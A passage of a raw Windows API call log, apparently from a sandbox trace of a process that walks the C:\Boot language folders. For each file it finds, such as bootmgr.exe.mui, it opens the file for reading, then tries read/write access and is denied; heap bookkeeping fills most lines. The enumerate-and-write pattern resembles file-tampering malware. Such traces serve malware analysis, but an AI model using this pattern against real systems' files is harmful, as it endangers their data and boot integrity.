dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.024] AreFileApisANSI () returned 1 [0070.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hr-HR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hr-HR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0070.025] AreFileApisANSI () returned 1 [0070.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0070.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 30 [0070.025] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.025] GetFileType (hFile=0x41c) returned 0x1 [0070.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.025] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.025] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.025] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.026] CloseHandle (hObject=0x41c) returned 1 [0070.026] AreFileApisANSI () returned 1 [0070.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0070.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 30 [0070.026] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.026] GetLastError () returned 0x5 [0070.026] GetLastError () returned 0x5 [0070.026] SetLastError (dwErrCode=0x5) [0070.026] GetLastError () returned 0x5 [0070.026] SetLastError (dwErrCode=0x5) [0070.026] GetLastError () returned 0x5 [0070.026] SetLastError (dwErrCode=0x5) [0070.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.026] FindNextFileW (in: hFindFile=0x78010, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x690d8, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⭠\x01⺊Ā")) returned 0 [0070.026] FindClose (in: hFindFile=0x78010 | out: hFindFile=0x78010) returned 1 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.027] AreFileApisANSI () returned 1 [0070.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hu-HU", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hu-HU", lpUsedDefaultChar=0x0) returned 14 [0070.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.028] AreFileApisANSI () returned 1 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88770 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88770, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\hu-HU") returned 14 [0070.028] CreateFileW (lpFileName="C:\\Boot\\hu-HU" (normalized: "c:\\boot\\hu-hu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.028] GetLastError () returned 0x5 [0070.028] GetLastError () returned 0x5 [0070.028] SetLastError (dwErrCode=0x5) [0070.028] GetLastError () returned 0x5 [0070.028] SetLastError (dwErrCode=0x5) [0070.028] GetLastError () returned 0x5 [0070.028] SetLastError (dwErrCode=0x5) [0070.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.028] AreFileApisANSI () returned 1 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x885b8 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x885b8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\hu-HU") returned 14 [0070.028] CreateFileW (lpFileName="C:\\Boot\\hu-HU" (normalized: "c:\\boot\\hu-hu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.028] GetLastError () returned 0x5 [0070.028] GetLastError () returned 0x5 [0070.028] SetLastError (dwErrCode=0x5) [0070.028] GetLastError () returned 0x5 [0070.028] SetLastError (dwErrCode=0x5) [0070.029] GetLastError () returned 0x5 [0070.029] SetLastError (dwErrCode=0x5) [0070.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.029] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.029] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.029] FindFirstFileExW (in: lpFileName="C:\\Boot\\hu-HU\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x77fd0 [0070.029] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.029] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.029] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x465f8 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.030] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.030] AreFileApisANSI () returned 1 [0070.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\hu-HU\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\hu-HU\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.030] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.030] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0070.031] AreFileApisANSI () returned 1 [0070.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.031] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 30 [0070.031] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.031] GetFileType (hFile=0x41c) returned 0x1 [0070.032] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.032] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.032] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.032] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.032] CloseHandle (hObject=0x41c) returned 1 [0070.034] AreFileApisANSI () returned 1 [0070.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.034] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 30 [0070.035] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.035] GetLastError () returned 0x5 [0070.035] GetLastError () returned 0x5 [0070.035] SetLastError (dwErrCode=0x5) [0070.035] GetLastError () returned 0x5 [0070.035] SetLastError (dwErrCode=0x5) [0070.035] GetLastError () returned 0x5 [0070.035] SetLastError (dwErrCode=0x5) [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.035] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.035] FindNextFileW (in: hFindFile=0x77fd0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0070.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.035] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.035] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.035] RtlAllocateHeap 